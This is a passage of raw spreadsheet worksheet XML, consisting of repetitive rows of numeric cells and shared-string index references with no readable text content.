        <v>1.0</v>
      </c>
      <c r="E29289" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29289" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29290" ht="15.75" customHeight="1">
      <c r="A29290" s="1">
        <v>5331.0</v>
      </c>
      <c r="B29290" s="2">
        <v>4.5313623E7</v>
      </c>
      <c r="C29290" s="2" t="s">
        <v>28158</v>
      </c>
      <c r="D29290" s="2">
        <v>1.0</v>
      </c>
      <c r="E29290" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29290" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29291" ht="15.75" customHeight="1">
      <c r="A29291" s="1">
        <v>5472.0</v>
      </c>
      <c r="B29291" s="2">
        <v>4.5709327E7</v>
      </c>
      <c r="C29291" s="2" t="s">
        <v>28159</v>
      </c>
      <c r="D29291" s="2">
        <v>1.0</v>
      </c>
      <c r="E29291" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29291" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29292" ht="15.75" customHeight="1">
      <c r="A29292" s="1">
        <v>6012.0</v>
      </c>
      <c r="B29292" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C29292" s="2" t="s">
        <v>28160</v>
      </c>
      <c r="D29292" s="2">
        <v>1.0</v>
      </c>
      <c r="E29292" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29292" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29293" ht="15.75" customHeight="1">
      <c r="A29293" s="1">
        <v>6033.0</v>
      </c>
      <c r="B29293" s="2">
        <v>4.7572498E7</v>
      </c>
      <c r="C29293" s="2" t="s">
        <v>28161</v>
      </c>
      <c r="D29293" s="2">
        <v>1.0</v>
      </c>
      <c r="E29293" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29293" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29294" ht="15.75" customHeight="1">
      <c r="A29294" s="1">
        <v>6218.0</v>
      </c>
      <c r="B29294" s="2">
        <v>4.8021755E7</v>
      </c>
      <c r="C29294" s="2" t="s">
        <v>28162</v>
      </c>
      <c r="D29294" s="2">
        <v>1.0</v>
      </c>
      <c r="E29294" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29294" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29295" ht="15.75" customHeight="1">
      <c r="A29295" s="1">
        <v>6232.0</v>
      </c>
      <c r="B29295" s="2">
        <v>4.8065475E7</v>
      </c>
      <c r="C29295" s="2" t="s">
        <v>28163</v>
      </c>
      <c r="D29295" s="2">
        <v>1.0</v>
      </c>
      <c r="E29295" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29295" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29296" ht="15.75" customHeight="1">
      <c r="A29296" s="1">
        <v>6486.0</v>
      </c>
      <c r="B29296" s="2">
        <v>4.868095E7</v>
      </c>
      <c r="C29296" s="2" t="s">
        <v>28164</v>
      </c>
      <c r="D29296" s="2">
        <v>1.0</v>
      </c>
      <c r="E29296" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29296" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29297" ht="15.75" customHeight="1">
      <c r="A29297" s="1">
        <v>6503.0</v>
      </c>
      <c r="B29297" s="2">
        <v>4.8719199E7</v>
      </c>
      <c r="C29297" s="2" t="s">
        <v>28165</v>
      </c>
      <c r="D29297" s="2">
        <v>1.0</v>
      </c>
      <c r="E29297" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29297" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29298" ht="15.75" customHeight="1">
      <c r="A29298" s="1">
        <v>7322.0</v>
      </c>
      <c r="B29298" s="2">
        <v>5.0893808E7</v>
      </c>
      <c r="C29298" s="2" t="s">
        <v>28166</v>
      </c>
      <c r="D29298" s="2">
        <v>1.0</v>
      </c>
      <c r="E29298" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29298" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29299" ht="15.75" customHeight="1">
      <c r="A29299" s="1">
        <v>8191.0</v>
      </c>
      <c r="B29299" s="2">
        <v>5.3252741E7</v>
      </c>
      <c r="C29299" s="2" t="s">
        <v>28167</v>
      </c>
      <c r="D29299" s="2">
        <v>1.0</v>
      </c>
      <c r="E29299" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29299" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29300" ht="15.75" customHeight="1">
      <c r="A29300" s="1">
        <v>8498.0</v>
      </c>
      <c r="B29300" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C29300" s="2" t="s">
        <v>28168</v>
      </c>
      <c r="D29300" s="2">
        <v>1.0</v>
      </c>
      <c r="E29300" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29300" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29301" ht="15.75" customHeight="1">
      <c r="A29301" s="1">
        <v>8598.0</v>
      </c>
      <c r="B29301" s="2">
        <v>5.4247335E7</v>
      </c>
      <c r="C29301" s="2" t="s">
        <v>28169</v>
      </c>
      <c r="D29301" s="2">
        <v>1.0</v>
      </c>
      <c r="E29301" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29301" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29302" ht="15.75" customHeight="1">
      <c r="A29302" s="1">
        <v>9043.0</v>
      </c>
      <c r="B29302" s="2">
        <v>5.5055249E7</v>
      </c>
      <c r="C29302" s="2" t="s">
        <v>28170</v>
      </c>
      <c r="D29302" s="2">
        <v>1.0</v>
      </c>
      <c r="E29302" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29302" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29303" ht="15.75" customHeight="1">
      <c r="A29303" s="1">
        <v>9446.0</v>
      </c>
      <c r="B29303" s="2">
        <v>5.5818755E7</v>
      </c>
      <c r="C29303" s="2" t="s">
        <v>28171</v>
      </c>
      <c r="D29303" s="2">
        <v>1.0</v>
      </c>
      <c r="E29303" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29303" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29304" ht="15.75" customHeight="1">
      <c r="A29304" s="1">
        <v>10660.0</v>
      </c>
      <c r="B29304" s="2">
        <v>1.4241397E7</v>
      </c>
      <c r="C29304" s="2" t="s">
        <v>28172</v>
      </c>
      <c r="D29304" s="2">
        <v>1.0</v>
      </c>
      <c r="E29304" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29304" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29305" ht="15.75" customHeight="1">
      <c r="A29305" s="1">
        <v>10699.0</v>
      </c>
      <c r="B29305" s="2">
        <v>1.4838596E7</v>
      </c>
      <c r="C29305" s="2" t="s">
        <v>28173</v>
      </c>
      <c r="D29305" s="2">
        <v>1.0</v>
      </c>
      <c r="E29305" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29305" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29306" ht="15.75" customHeight="1">
      <c r="A29306" s="1">
        <v>10882.0</v>
      </c>
      <c r="B29306" s="2">
        <v>1.6510738E7</v>
      </c>
      <c r="C29306" s="2" t="s">
        <v>28174</v>
      </c>
      <c r="D29306" s="2">
        <v>1.0</v>
      </c>
      <c r="E29306" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29306" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29307" ht="15.75" customHeight="1">
      <c r="A29307" s="1">
        <v>11178.0</v>
      </c>
      <c r="B29307" s="2">
        <v>1.9703856E7</v>
      </c>
      <c r="C29307" s="2" t="s">
        <v>28175</v>
      </c>
      <c r="D29307" s="2">
        <v>1.0</v>
      </c>
      <c r="E29307" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29307" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29308" ht="15.75" customHeight="1">
      <c r="A29308" s="1">
        <v>11231.0</v>
      </c>
      <c r="B29308" s="2">
        <v>2.0330908E7</v>
      </c>
      <c r="C29308" s="2" t="s">
        <v>28176</v>
      </c>
      <c r="D29308" s="2">
        <v>1.0</v>
      </c>
      <c r="E29308" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29308" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29309" ht="15.75" customHeight="1">
      <c r="A29309" s="1">
        <v>11442.0</v>
      </c>
      <c r="B29309" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C29309" s="2" t="s">
        <v>28177</v>
      </c>
      <c r="D29309" s="2">
        <v>1.0</v>
      </c>
      <c r="E29309" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29309" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29310" ht="15.75" customHeight="1">
      <c r="A29310" s="1">
        <v>12220.0</v>
      </c>
      <c r="B29310" s="2">
        <v>2.7730166E7</v>
      </c>
      <c r="C29310" s="2" t="s">
        <v>28178</v>
      </c>
      <c r="D29310" s="2">
        <v>1.0</v>
      </c>
      <c r="E29310" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29310" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29311" ht="15.75" customHeight="1">
      <c r="A29311" s="1">
        <v>12427.0</v>
      </c>
      <c r="B29311" s="2">
        <v>2.9190898E7</v>
      </c>
      <c r="C29311" s="2" t="s">
        <v>28179</v>
      </c>
      <c r="D29311" s="2">
        <v>1.0</v>
      </c>
      <c r="E29311" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29311" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29312" ht="15.75" customHeight="1">
      <c r="A29312" s="1">
        <v>12460.0</v>
      </c>
      <c r="B29312" s="2">
        <v>2.9370091E7</v>
      </c>
      <c r="C29312" s="2" t="s">
        <v>28180</v>
      </c>
      <c r="D29312" s="2">
        <v>1.0</v>
      </c>
      <c r="E29312" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29312" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29313" ht="15.75" customHeight="1">
      <c r="A29313" s="1">
        <v>12538.0</v>
      </c>
      <c r="B29313" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C29313" s="2" t="s">
        <v>28181</v>
      </c>
      <c r="D29313" s="2">
        <v>1.0</v>
      </c>
      <c r="E29313" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29313" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29314" ht="15.75" customHeight="1">
      <c r="A29314" s="1">
        <v>12903.0</v>
      </c>
      <c r="B29314" s="2">
        <v>3.207467E7</v>
      </c>
      <c r="C29314" s="2" t="s">
        <v>28182</v>
      </c>
      <c r="D29314" s="2">
        <v>1.0</v>
      </c>
      <c r="E29314" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29314" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29315" ht="15.75" customHeight="1">
      <c r="A29315" s="1">
        <v>12917.0</v>
      </c>
      <c r="B29315" s="2">
        <v>3.2254675E7</v>
      </c>
      <c r="C29315" s="2" t="s">
        <v>28183</v>
      </c>
      <c r="D29315" s="2">
        <v>1.0</v>
      </c>
      <c r="E29315" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29315" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29316" ht="15.75" customHeight="1">
      <c r="A29316" s="1">
        <v>13468.0</v>
      </c>
      <c r="B29316" s="2">
        <v>3.5232728E7</v>
      </c>
      <c r="C29316" s="2" t="s">
        <v>28184</v>
      </c>
      <c r="D29316" s="2">
        <v>1.0</v>
      </c>
      <c r="E29316" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29316" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29317" ht="15.75" customHeight="1">
      <c r="A29317" s="1">
        <v>13544.0</v>
      </c>
      <c r="B29317" s="2">
        <v>3.5640033E7</v>
      </c>
      <c r="C29317" s="2" t="s">
        <v>28185</v>
      </c>
      <c r="D29317" s="2">
        <v>1.0</v>
      </c>
      <c r="E29317" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29317" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29318" ht="15.75" customHeight="1">
      <c r="A29318" s="1">
        <v>13615.0</v>
      </c>
      <c r="B29318" s="2">
        <v>3.5853356E7</v>
      </c>
      <c r="C29318" s="2" t="s">
        <v>28186</v>
      </c>
      <c r="D29318" s="2">
        <v>1.0</v>
      </c>
      <c r="E29318" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29318" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29319" ht="15.75" customHeight="1">
      <c r="A29319" s="1">
        <v>13809.0</v>
      </c>
      <c r="B29319" s="2">
        <v>3.6669353E7</v>
      </c>
      <c r="C29319" s="2" t="s">
        <v>28187</v>
      </c>
      <c r="D29319" s="2">
        <v>1.0</v>
      </c>
      <c r="E29319" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29319" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29320" ht="15.75" customHeight="1">
      <c r="A29320" s="1">
        <v>14065.0</v>
      </c>
      <c r="B29320" s="2">
        <v>3.7593562E7</v>
      </c>
      <c r="C29320" s="2" t="s">
        <v>28188</v>
      </c>
      <c r="D29320" s="2">
        <v>1.0</v>
      </c>
      <c r="E29320" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29320" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29321" ht="15.75" customHeight="1">
      <c r="A29321" s="1">
        <v>14759.0</v>
      </c>
      <c r="B29321" s="2">
        <v>4.0821514E7</v>
      </c>
      <c r="C29321" s="2" t="s">
        <v>28189</v>
      </c>
      <c r="D29321" s="2">
        <v>1.0</v>
      </c>
      <c r="E29321" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29321" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29322" ht="15.75" customHeight="1">
      <c r="A29322" s="1">
        <v>14819.0</v>
      </c>
      <c r="B29322" s="2">
        <v>4.0958096E7</v>
      </c>
      <c r="C29322" s="2" t="s">
        <v>28190</v>
      </c>
      <c r="D29322" s="2">
        <v>1.0</v>
      </c>
      <c r="E29322" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29322" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29323" ht="15.75" customHeight="1">
      <c r="A29323" s="1">
        <v>15151.0</v>
      </c>
      <c r="B29323" s="2">
        <v>4.1969761E7</v>
      </c>
      <c r="C29323" s="2" t="s">
        <v>28191</v>
      </c>
      <c r="D29323" s="2">
        <v>1.0</v>
      </c>
      <c r="E29323" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29323" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29324" ht="15.75" customHeight="1">
      <c r="A29324" s="1">
        <v>15175.0</v>
      </c>
      <c r="B29324" s="2">
        <v>4.2013284E7</v>
      </c>
      <c r="C29324" s="2" t="s">
        <v>28192</v>
      </c>
      <c r="D29324" s="2">
        <v>1.0</v>
      </c>
      <c r="E29324" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29324" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29325" ht="15.75" customHeight="1">
      <c r="A29325" s="1">
        <v>15320.0</v>
      </c>
      <c r="B29325" s="2">
        <v>4.2514095E7</v>
      </c>
      <c r="C29325" s="2" t="s">
        <v>28193</v>
      </c>
      <c r="D29325" s="2">
        <v>1.0</v>
      </c>
      <c r="E29325" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29325" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29326" ht="15.75" customHeight="1">
      <c r="A29326" s="1">
        <v>15391.0</v>
      </c>
      <c r="B29326" s="2">
        <v>4.280654E7</v>
      </c>
      <c r="C29326" s="2" t="s">
        <v>28194</v>
      </c>
      <c r="D29326" s="2">
        <v>1.0</v>
      </c>
      <c r="E29326" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29326" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29327" ht="15.75" customHeight="1">
      <c r="A29327" s="1">
        <v>15396.0</v>
      </c>
      <c r="B29327" s="2">
        <v>4.2823027E7</v>
      </c>
      <c r="C29327" s="2" t="s">
        <v>28195</v>
      </c>
      <c r="D29327" s="2">
        <v>1.0</v>
      </c>
      <c r="E29327" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29327" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29328" ht="15.75" customHeight="1">
      <c r="A29328" s="1">
        <v>15670.0</v>
      </c>
      <c r="B29328" s="2">
        <v>4.3767343E7</v>
      </c>
      <c r="C29328" s="2" t="s">
        <v>28196</v>
      </c>
      <c r="D29328" s="2">
        <v>1.0</v>
      </c>
      <c r="E29328" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29328" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29329" ht="15.75" customHeight="1">
      <c r="A29329" s="1">
        <v>15821.0</v>
      </c>
      <c r="B29329" s="2">
        <v>4.4281892E7</v>
      </c>
      <c r="C29329" s="2" t="s">
        <v>28197</v>
      </c>
      <c r="D29329" s="2">
        <v>1.0</v>
      </c>
      <c r="E29329" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29329" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29330" ht="15.75" customHeight="1">
      <c r="A29330" s="1">
        <v>15845.0</v>
      </c>
      <c r="B29330" s="2">
        <v>4.4420245E7</v>
      </c>
      <c r="C29330" s="2" t="s">
        <v>28198</v>
      </c>
      <c r="D29330" s="2">
        <v>1.0</v>
      </c>
      <c r="E29330" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29330" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29331" ht="15.75" customHeight="1">
      <c r="A29331" s="1">
        <v>16055.0</v>
      </c>
      <c r="B29331" s="2">
        <v>4.5265426E7</v>
      </c>
      <c r="C29331" s="2" t="s">
        <v>28199</v>
      </c>
      <c r="D29331" s="2">
        <v>1.0</v>
      </c>
      <c r="E29331" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29331" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29332" ht="15.75" customHeight="1">
      <c r="A29332" s="1">
        <v>16133.0</v>
      </c>
      <c r="B29332" s="2">
        <v>4.5519515E7</v>
      </c>
      <c r="C29332" s="2" t="s">
        <v>28200</v>
      </c>
      <c r="D29332" s="2">
        <v>1.0</v>
      </c>
      <c r="E29332" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29332" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29333" ht="15.75" customHeight="1">
      <c r="A29333" s="1">
        <v>16170.0</v>
      </c>
      <c r="B29333" s="2">
        <v>4.5628295E7</v>
      </c>
      <c r="C29333" s="2" t="s">
        <v>28201</v>
      </c>
      <c r="D29333" s="2">
        <v>1.0</v>
      </c>
      <c r="E29333" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29333" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29334" ht="15.75" customHeight="1">
      <c r="A29334" s="1">
        <v>17043.0</v>
      </c>
      <c r="B29334" s="2">
        <v>4.8525875E7</v>
      </c>
      <c r="C29334" s="2" t="s">
        <v>28202</v>
      </c>
      <c r="D29334" s="2">
        <v>1.0</v>
      </c>
      <c r="E29334" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29334" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29335" ht="15.75" customHeight="1">
      <c r="A29335" s="1">
        <v>17065.0</v>
      </c>
      <c r="B29335" s="2">
        <v>4.8573532E7</v>
      </c>
      <c r="C29335" s="2" t="s">
        <v>28203</v>
      </c>
      <c r="D29335" s="2">
        <v>1.0</v>
      </c>
      <c r="E29335" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29335" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29336" ht="15.75" customHeight="1">
      <c r="A29336" s="1">
        <v>17174.0</v>
      </c>
      <c r="B29336" s="2">
        <v>4.8892799E7</v>
      </c>
      <c r="C29336" s="2" t="s">
        <v>28204</v>
      </c>
      <c r="D29336" s="2">
        <v>1.0</v>
      </c>
      <c r="E29336" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29336" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29337" ht="15.75" customHeight="1">
      <c r="A29337" s="1">
        <v>17240.0</v>
      </c>
      <c r="B29337" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C29337" s="2" t="s">
        <v>28205</v>
      </c>
      <c r="D29337" s="2">
        <v>1.0</v>
      </c>
      <c r="E29337" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29337" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29338" ht="15.75" customHeight="1">
      <c r="A29338" s="1">
        <v>17694.0</v>
      </c>
      <c r="B29338" s="2">
        <v>5.0516751E7</v>
      </c>
      <c r="C29338" s="2" t="s">
        <v>28206</v>
      </c>
      <c r="D29338" s="2">
        <v>1.0</v>
      </c>
      <c r="E29338" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29338" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29339" ht="15.75" customHeight="1">
      <c r="A29339" s="1">
        <v>17872.0</v>
      </c>
      <c r="B29339" s="2">
        <v>5.1027132E7</v>
      </c>
      <c r="C29339" s="2" t="s">
        <v>28207</v>
      </c>
      <c r="D29339" s="2">
        <v>1.0</v>
      </c>
      <c r="E29339" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29339" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29340" ht="15.75" customHeight="1">
      <c r="A29340" s="1">
        <v>18415.0</v>
      </c>
      <c r="B29340" s="2">
        <v>5.2690414E7</v>
      </c>
      <c r="C29340" s="2" t="s">
        <v>28208</v>
      </c>
      <c r="D29340" s="2">
        <v>1.0</v>
      </c>
      <c r="E29340" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29340" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29341" ht="15.75" customHeight="1">
      <c r="A29341" s="1">
        <v>18476.0</v>
      </c>
      <c r="B29341" s="2">
        <v>5.2854217E7</v>
      </c>
      <c r="C29341" s="2" t="s">
        <v>28209</v>
      </c>
      <c r="D29341" s="2">
        <v>1.0</v>
      </c>
      <c r="E29341" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29341" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29342" ht="15.75" customHeight="1">
      <c r="A29342" s="1">
        <v>18707.0</v>
      </c>
      <c r="B29342" s="2">
        <v>5.3642806E7</v>
      </c>
      <c r="C29342" s="2" t="s">
        <v>28210</v>
      </c>
      <c r="D29342" s="2">
        <v>1.0</v>
      </c>
      <c r="E29342" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29342" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29343" ht="15.75" customHeight="1">
      <c r="A29343" s="1">
        <v>19228.0</v>
      </c>
      <c r="B29343" s="2">
        <v>5.5059356E7</v>
      </c>
      <c r="C29343" s="2" t="s">
        <v>28211</v>
      </c>
      <c r="D29343" s="2">
        <v>1.0</v>
      </c>
      <c r="E29343" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29343" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29344" ht="15.75" customHeight="1">
      <c r="A29344" s="1">
        <v>19542.0</v>
      </c>
      <c r="B29344" s="2">
        <v>5.6030506E7</v>
      </c>
      <c r="C29344" s="2" t="s">
        <v>28212</v>
      </c>
      <c r="D29344" s="2">
        <v>1.0</v>
      </c>
      <c r="E29344" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29344" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29345" ht="15.75" customHeight="1">
      <c r="A29345" s="1">
        <v>19592.0</v>
      </c>
      <c r="B29345" s="2">
        <v>5.6163766E7</v>
      </c>
      <c r="C29345" s="2" t="s">
        <v>28213</v>
      </c>
      <c r="D29345" s="2">
        <v>1.0</v>
      </c>
      <c r="E29345" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29345" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29346" ht="15.75" customHeight="1">
      <c r="A29346" s="1">
        <v>19638.0</v>
      </c>
      <c r="B29346" s="2">
        <v>5.6282151E7</v>
      </c>
      <c r="C29346" s="2" t="s">
        <v>28214</v>
      </c>
      <c r="D29346" s="2">
        <v>1.0</v>
      </c>
      <c r="E29346" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29346" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29347" ht="15.75" customHeight="1">
      <c r="A29347" s="1">
        <v>19721.0</v>
      </c>
      <c r="B29347" s="2">
        <v>5.6598612E7</v>
      </c>
      <c r="C29347" s="2" t="s">
        <v>28215</v>
      </c>
      <c r="D29347" s="2">
        <v>1.0</v>
      </c>
      <c r="E29347" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29347" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29348" ht="15.75" customHeight="1">
      <c r="A29348" s="1">
        <v>19769.0</v>
      </c>
      <c r="B29348" s="2">
        <v>5.6764002E7</v>
      </c>
      <c r="C29348" s="2" t="s">
        <v>28216</v>
      </c>
      <c r="D29348" s="2">
        <v>1.0</v>
      </c>
      <c r="E29348" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29348" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29349" ht="15.75" customHeight="1">
      <c r="A29349" s="1">
        <v>19917.0</v>
      </c>
      <c r="B29349" s="2">
        <v>5.7404571E7</v>
      </c>
      <c r="C29349" s="2" t="s">
        <v>28217</v>
      </c>
      <c r="D29349" s="2">
        <v>1.0</v>
      </c>
      <c r="E29349" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29349" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29350" ht="15.75" customHeight="1">
      <c r="A29350" s="1">
        <v>20056.0</v>
      </c>
      <c r="B29350" s="2">
        <v>8192762.0</v>
      </c>
      <c r="C29350" s="2" t="s">
        <v>28218</v>
      </c>
      <c r="D29350" s="2">
        <v>1.0</v>
      </c>
      <c r="E29350" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29350" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29351" ht="15.75" customHeight="1">
      <c r="A29351" s="1">
        <v>20199.0</v>
      </c>
      <c r="B29351" s="2">
        <v>1.0572097E7</v>
      </c>
      <c r="C29351" s="2" t="s">
        <v>28219</v>
      </c>
      <c r="D29351" s="2">
        <v>1.0</v>
      </c>
      <c r="E29351" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29351" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29352" ht="15.75" customHeight="1">
      <c r="A29352" s="1">
        <v>21414.0</v>
      </c>
      <c r="B29352" s="2">
        <v>2.1985099E7</v>
      </c>
      <c r="C29352" s="2" t="s">
        <v>28220</v>
      </c>
      <c r="D29352" s="2">
        <v>1.0</v>
      </c>
      <c r="E29352" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29352" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29353" ht="15.75" customHeight="1">
      <c r="A29353" s="1">
        <v>23725.0</v>
      </c>
      <c r="B29353" s="2">
        <v>7234105.0</v>
      </c>
      <c r="C29353" s="2" t="s">
        <v>28221</v>
      </c>
      <c r="D29353" s="2">
        <v>1.0</v>
      </c>
      <c r="E29353" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29353" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29354" ht="15.75" customHeight="1">
      <c r="A29354" s="1">
        <v>24301.0</v>
      </c>
      <c r="B29354" s="2">
        <v>1.0572096E7</v>
      </c>
      <c r="C29354" s="2" t="s">
        <v>28219</v>
      </c>
      <c r="D29354" s="2">
        <v>1.0</v>
      </c>
      <c r="E29354" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29354" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29355" ht="15.75" customHeight="1">
      <c r="A29355" s="1">
        <v>24933.0</v>
      </c>
      <c r="B29355" s="2">
        <v>1.2457588E7</v>
      </c>
      <c r="C29355" s="2" t="s">
        <v>28222</v>
      </c>
      <c r="D29355" s="2">
        <v>1.0</v>
      </c>
      <c r="E29355" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F29355" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="29356" ht="15.75" customHeight="1">
      <c r="A29356" s="1">
        <v>25158.0</v>
      </c>
      <c r="B29356" s="2">
        <v>1.3065718E7</v>
      </c>
      <c r="C29356" s="2" t="s">
        <v>28223</v>
      </c>
      <c r="D29356" s="2">
